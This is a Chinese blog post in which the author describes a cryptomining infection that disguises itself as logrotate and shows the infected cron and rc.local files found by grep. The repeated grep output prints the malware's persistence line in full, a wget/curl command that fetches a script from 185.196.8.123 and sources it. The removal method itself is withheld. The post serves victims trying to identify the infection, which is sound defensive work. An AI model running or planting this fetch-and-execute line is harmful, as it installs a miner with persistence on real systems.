首页 > 其他分享 >【已解决】挖矿病毒 logrotate 185.196.8.123

【已解决】挖矿病毒 logrotate 185.196.8.123

时间:2024-07-08 12:31:02浏览次数:18  
标签:文件 grep 8.123 alternatives etc logrotate source 挖矿

如果你最近也中了这个病毒,看这篇文章就对了。

网上找了几篇类似文章,都是教你杀进程、删文件,但新版的病毒已经进化了,进程杀死复活,文件删掉又有了...

经过本人几天的尝试,最终找到了干掉他的方法。

 

先确定下你的症状是不是跟我一样?

问题现象:Shell登录慢,logrorateCPU占用高,这个进程的文件路径为:/root/.config/logrotate,删掉又重新生成。

 

使用find /etc | xargs grep -ri "185.196.8.123" 命令查了下,大概有以下文件被加入了恶意脚本:

各种级别的定时任务、系统登录、退出时执行

/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants: 没有那个文件或目录
grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants/qemu-guest-agent.service: 没有那个文件或目录
/etc/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
grep: /etc/alternatives/mta-mailqman: 没有那个文件或目录
grep: /etc/alternatives/mta-newaliasesman: 没有那个文件或目录
grep: /etc/alternatives/mta-sendmailman: 没有那个文件或目录
grep: /etc/alternatives/mta-aliasesman: 没有那个文件或目录
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)

 

解决思路:

正常解决思路无法清理掉,博主使用了一波骚操作来顺利清理掉。为了防止写此病毒脚本的人看到这篇文章来升级脚本,思路就不放出来了。需要的同学请留言,我来无偿发你

中病毒原因:我猜你大概率是开过8000端口

标签:文件,grep,8.123,alternatives,etc,logrotate,source,挖矿
From: https://www.cnblogs.com/aligege/p/18289685

相关文章

  • (转)Linux环境下使用logrotate工具实现nginx日志切割
    原文:https://www.cnblogs.com/even160941/p/13903291.html一.前提背景及需求Nginx运行日志默认保存在Nginx安装目录下的 /usr/local/nginx/logs目录(或/var/log/nginx目录下),包含access.log和error.log两个文件。(1) access.log 记录了哪些用户、哪些页面以及用户浏览器、i......
  • 服务器遭遇挖矿怎么办?
    背景根据某安全公司安全威胁检测到在2019年中,恶意软件拦截量为181.07亿次,其中挖矿类恶意软件感染占比最多(58%),其次为远程木马(占比14%),企业或组织内文件共享等机制也使得感染型病毒的比例在9%左右。恶意软件一哥挖矿软件攻击势头非常猛,加密货币挖矿流量较去年增长约100%,在类型上......
  • 挖矿病毒消灭记
    参考:https://blog.csdn.net/qq_59201520/article/details/129816447接上篇《挖矿病毒消灭记》传送门项目场景:叮咚,一条短信打破了安静平和的氛围。啊?咋又被挖矿了,现在在外面,回头要赶紧把进程关了问题描述回到家赶紧打开电脑输入命令行top,果然不出所料cpu飙升到200%,找到pid,......
  • (挖矿病毒清除)kdevtmpfsi 处理,其他挖矿软件也可用该思路清除
    1、Top命令线程运行情况,找到kdevtmpfsi对应的进程ID2、使用 kill-9PID3、过段时间再次被重启,说明有守护线程systemctlstatusPID查看其关联的守护进程,/tmp/kinsing  /tmp/kdevtmpfsi删除rm-rf/tmp/kinsingrm-rf/tmp/kdevtmpfsi4、crontab-l 命令先看看......
  • [转]查杀linux隐藏挖矿病毒rcu_tasked
    记录一次项目中挖矿病毒的经历这是黑客使用的批量蔓延病毒的工具,通过如下脚本[[email protected]]#cat/home/pischi/.bash_historycd/root/nvidia-smi;ls-a;cd.cfg;ls-a;wc-lip./key20-fippass22"nproc;nvidia-smi;rm-rf.cfg;mkdir.cfg;cd.cfg;wget193.42......
  • 挖矿流量分析之Stratum挖矿协议
    目录前言区块链和挖矿相关概念挖矿木马挖矿协议StratumStratum工作过程前言之前做了一个关于“挖矿行为检测”的大创训练项目,在这里记录一下我关于挖矿检测相关内容的学习。区块链和挖矿相关概念区块链首先需要了解一些关于区块链的内容。注意,区块链和挖矿是两个紧密相关但又......
  • 在Linux中,如何使用logrotate命令管理日志文件?
    logrotate是一个在Linux系统中用来管理和维护日志文件的工具。它可以自动地对日志文件进行压缩、删除旧的日志文件、创建新的日志文件,以及在日志轮换时运行指定的脚本。以下是如何使用logrotate命令的一些基本步骤和配置方法:1.安装logrotate在大多数Linux发行版中,logro......
  • linux实战-挖矿
    简介应急响应工程师在内网服务器发现有台主机cpu占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组虚拟机账号密码rootwebsecyjxyweb端口为80811、黑客的IP是?flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}2、黑客攻陷网站的具体时间是?flag格式:flag......
  • nginx1.24配置logrotate日志切割
    安装logrotate(如果尚未安装):yuminstalllogrotate#CentOS/RHEL配置logrotate:通常,logrotate的配置文件位于/etc/logrotate.conf,并且可以包含指向其他配置文件的引用。这些其他配置文件通常位于/etc/logrotate.d/目录中。创建Nginx的logrotate配置文件:vim/etc/lo......
  • 命令行调试logrotate
    logrotate配置文件一般存放在/etc/logrotate.d。场景1:不存在/var/lib/logrotate/status文件说明没有真正执行过logrotate。/var/lib/logrotate/status会记录上一次logrotate时间,记录的时间可能没有真正执行过。场景2:logrotate-d配置文件logrotate-v配置文件:执行logrotate......